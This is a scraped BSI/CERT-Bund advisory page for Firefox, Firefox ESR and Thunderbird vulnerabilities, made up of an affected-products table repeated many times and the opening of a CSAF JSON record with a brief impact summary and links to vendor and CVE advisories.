Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
References
60 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Thunderbird ist ein Open Source E-Mail Client.\r\nFirefox ist ein Open Source Web Browser.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird, Mozilla Firefox ESR und Mozilla Firefox ausnutzen, um seine Privilegien zu erh\u00f6hen, um einen Denial of Service Angriff durchzuf\u00fchren, um Informationen offenzulegen, um falsche Informationen darzustellen, und um Sicherheitsvorkehrungen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1228 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1228.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1228 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1228"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-30 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-30/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-31 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-31/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-32 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-32"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-33 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-33/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-34 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-34/"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4546 vom 2026-04-23",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00027.html"
},
{
"category": "external",
"summary": "National Vulnerability Database CVE-2026-6748 vom 2026-04-22",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6748"
},
{
"category": "external",
"summary": "National Vulnerability Database CVE-2026-6750 vom 2026-04-22",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6750"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:10610-1 vom 2026-04-25",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6VX2E6MLQKO7DPWQ4ZZHUP2YTTOARCJ2/"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-6229 vom 2026-04-24",
"url": "https://security-tracker.debian.org/tracker/DSA-6229-1"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4549 vom 2026-04-26",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00030.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10757 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10757"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10767 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10767.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10767 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10767"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20621-1 vom 2026-04-27",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6A4NBNRGRAA5IER7QAALUZTRHLEXIBXW/"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10757 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10757.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10766 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10766"
},
{
"category": "external",
